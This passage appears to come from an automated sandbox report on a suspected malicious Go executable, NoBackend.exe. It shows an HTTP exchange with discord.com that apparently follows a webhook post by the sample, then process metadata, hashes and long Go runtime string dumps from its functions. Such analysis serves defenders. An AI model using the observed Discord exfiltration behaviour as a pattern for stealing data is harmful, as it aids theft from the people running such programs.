:yawning_face:","fields":[{"inline":false,"name":" Download","value":"[Download](htt
2023-11-09 22:23:03 UTC	11	IN	HTTP/1.1 204 No Content Date: Thu, 09 Nov 2023 22:23:03 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=8c4e556c7f4e11ee93704a17db4a6ab3; Expires=Tue, 07-Nov-2028 22:23:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1699568583 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ljqzxA8JDNpK2P95DomhlVXGntfh5nZjvr12CM8dkvWhRvG3KDhJcs9MfZD%2BveY7LWURhfu0weQ8k4TI1g1Ua%2B0Co1YY6py7f7ZQC13znjj7Dqk2ZpRnyglc8r%2F8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=8c4e556c7f4e11ee93704a17db4a6ab3682fdf60d618950115f968ebbb0006dd523fdcd9630c7b111676057fda982c9e; Expires=Tue, 07-Nov-2028 22:23:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=4eb25c140f02d620d94cb838ce428cca047138d7-1699568583; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-11-09 22:23:03 UTC	12	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 56 7a 5a 52 42 47 51 65 61 43 74 50 65 7a 70 58 4d 56 46 49 4d 74 67 44 51 35 46 50 4e 45 4d 4e 34 35 75 79 51 56 58 5f 59 5a 67 2d 31 36 39 39 35 36 38 35 38 33 33 35 37 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 33 39 37 35 33 38 34 61 66 64 63 35 62 66 2d 53 45 41 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=VzZRBGQeaCtPezpXMVFIMtgDQ5FPNEMN45uyQVX_YZg-1699568583357-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 823975384afdc5bf-SEA

Target ID:	0
Start time:	23:22:56
Start date:	09/11/2023
Path:	C:\Users\user\Desktop\NoBackend.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\NoBackend.exe
Imagebase:	0xb50000
File size:	8'311'808 bytes
MD5 hash:	F6CE63ED5231CBA10CDC985E60CF151F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1149
Total number of Limit Nodes:	98

Executed Functions

Function 00B82080 Relevance: 45.3, Strings: 36, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepani, xrefs: 00B82601
eObject, xrefs: 00B822A3
ine_get_, xrefs: 00B825B4
tlGetCur, xrefs: 00B822FC
RtlGetNt, xrefs: 00B82354
ntdll.dll, xrefs: 00B82232
timeBegi, xrefs: 00B8241C
ws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in goselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorysql: Rows are closedasn1: syntax error: , xrefs: 00B82612
dPeriod, xrefs: 00B8247E
rentPeb, xrefs: 00B8230B
advapi32.dll, xrefs: 00B82175
Numbers, xrefs: 00B82378
ForSingl, xrefs: 00B82291
advapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc invalidcompileCallback: type trace: alloc too largenon-Go function at, xrefs: 00B82658
tVersion, xrefs: 00B82366
Handler, xrefs: 00B82124
kernel32.dll not foundadvapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc invalidcompileCallback: type trace: alloc too l, xrefs: 00B82669
kernel32.dll, xrefs: 00B8209A
WSAGetOv, xrefs: 00B8252E
NtWaitFo, xrefs: 00B8227F
RtlGetCu, xrefs: 00B822ED
redConti, xrefs: 00B82100
verlappe, xrefs: 00B82540
dResult, xrefs: 00B82552
timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too longinvalid function symbol tableinvalid length of trace even, xrefs: 00B82625
SystemFu, xrefs: 00B821BD
version, xrefs: 00B825C3
AddVecto, xrefs: 00B820EE
stemFunc, xrefs: 00B821CF
winmm.dll, xrefs: 00B823CF
ws2_32.dll, xrefs: 00B824E6
nPeriod, xrefs: 00B8242B
tion036, xrefs: 00B821E1
Continue, xrefs: 00B82112
wine_get, xrefs: 00B825A5
timeEndP, xrefs: 00B8246F

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: AddVecto$Continue$ForSingl$Handler$NtWaitFo$Numbers$RtlGetCu$RtlGetNt$SystemFu$WSAGetOv$WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepani$advapi32.dll$advapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc invalidcompileCallback: type trace: alloc too largenon-Go function at$dPeriod$dResult$eObject$ine_get_$kernel32.dll$kernel32.dll not foundadvapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc invalidcompileCallback: type trace: alloc too l$nPeriod$ntdll.dll$redConti$rentPeb$stemFunc$tVersion$timeBegi$timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too longinvalid function symbol tableinvalid length of trace even$timeEndP$tion036$tlGetCur$verlappe$version$wine_get$winmm.dll$ws2_32.dll$ws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valuewirep: already in goselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorysql: Rows are closedasn1: syntax error:
API String ID: 0-1915483721
Opcode ID: 68019c610c11cd821bbc3cb703d32c38a7db10b5d529d6c7167535eef94f67cb
Instruction ID: 7afae3d399b068834dd27909c87169a3024eff464160df80eaaa8967a369832a
Opcode Fuzzy Hash: 68019c610c11cd821bbc3cb703d32c38a7db10b5d529d6c7167535eef94f67cb
Instruction Fuzzy Hash: 4BE14776209B8585DB24DB11F88439AB3E9F749BC0F148576AADC87B69EFB9C091C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B74EC0 Relevance: 13.3, Strings: 10, Instructions: 756COMMON

Download Yara Rule

Strings

swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runti, xrefs: 00B757D7
sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine --%s--, xrefs: 00B75818, 00B75BE5
nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-rangeNO_PROXYno_proxynet/httpgo/buildx509sha1bad , xrefs: 00B758B2
sweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevrunt, xrefs: 00B75919
mspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedcould not find QPC syscallsruntime: asyncPreemptStack=runtime: thread ID overflowstopTheWorld: holding locksgcstopm: not waiting for gcinternal lockOSTh, xrefs: 00B75C2A
mspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function sql: RawBytes isn't allowe, xrefs: 00B75858
mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgorefl, xrefs: 00B75833, 00B75C05
previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:, xrefs: 00B758CF
sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executionsql: unk, xrefs: 00B757C6
mspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1, xrefs: 00B75C3B

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgorefl$ nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes --%s%s: %swsaioctlCurveID(finishedexporterReceived[::1]:53continue_gatewayinvalid address readfromunixgramif-rangeNO_PROXYno_proxynet/httpgo/buildx509sha1bad $ previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:$ sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine --%s--$mspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preemptible goroutineruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function sql: RawBytes isn't allowe$mspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedcould not find QPC syscallsruntime: asyncPreemptStack=runtime: thread ID overflowstopTheWorld: holding locksgcstopm: not waiting for gcinternal lockOSTh$mspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1$sweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevrunt$sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executionsql: unk$swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runti
API String ID: 0-1028335054
Opcode ID: e2160dbd9494c00b3e82dfdea8a0bd6756d3d6252496a6703bc9143822d42760
Instruction ID: d6e79393922d2586aac2485f38b7740f8711725384c8f52903513fe6284b2b46
Opcode Fuzzy Hash: e2160dbd9494c00b3e82dfdea8a0bd6756d3d6252496a6703bc9143822d42760
Instruction Fuzzy Hash: 4F72CF33208BC486DB65DF25E4803AEB7A1F395B84F4495A6EB9D03B69DF78C494CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C1E0 Relevance: 12.9, Strings: 10, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi, xrefs: 00B5C596
out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preempti, xrefs: 00B5C5B8
, xrefs: 00B5C86D
arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p , xrefs: 00B5C5A7
end outside usable address spaceruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerrunt, xrefs: 00B5C87D
out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit, xrefs: 00B5C585
memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new , xrefs: 00B5C93E
base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c, xrefs: 00B5C84F
region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime., xrefs: 00B5C823
) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: , xrefs: 00B5C914

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: $) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: $arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p $base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c$end outside usable address spaceruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerrunt$memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new $out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit$out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preempti$out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi$region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.
API String ID: 0-1376041300
Opcode ID: ec9c230f03072faf2a0b4a1f005db1ce9cb818f98e8037c777245295bd58fb23
Instruction ID: d6e5d20645624e311a12a3f8ddc937d1a462c462806ec484a927de083c304f67
Opcode Fuzzy Hash: ec9c230f03072faf2a0b4a1f005db1ce9cb818f98e8037c777245295bd58fb23
Instruction Fuzzy Hash: 6602BB32608BC086DB649F51F4403AABBA5F389B90F5442A6EFAD53799DF7CC588C740

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CD80 Relevance: 8.0, Strings: 6, Instructions: 514COMMON

Download Yara Rule

Strings

malloc deadlockruntime error: elem size wrong with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = recovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=]morebuf={pc:: no frame (sp=runti, xrefs: 00B5D56E
delayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablecrypto/tls: Exp, xrefs: 00B5D507
mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largecrypto/cipher: incorrect nonce length given to GCMtls: recei, xrefs: 00B5D57F
mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= , xrefs: 00B5D54C
malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=, xrefs: 00B5D55D
!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 00B5D0CD

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
